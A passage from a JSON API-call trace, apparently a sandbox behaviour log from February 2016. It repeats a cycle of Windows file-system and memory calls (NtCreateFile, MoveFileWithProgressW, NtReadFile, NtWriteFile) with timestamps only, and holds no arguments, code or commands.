17:41:47,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,500", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,520", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,530", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,541", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,551", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,571", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": 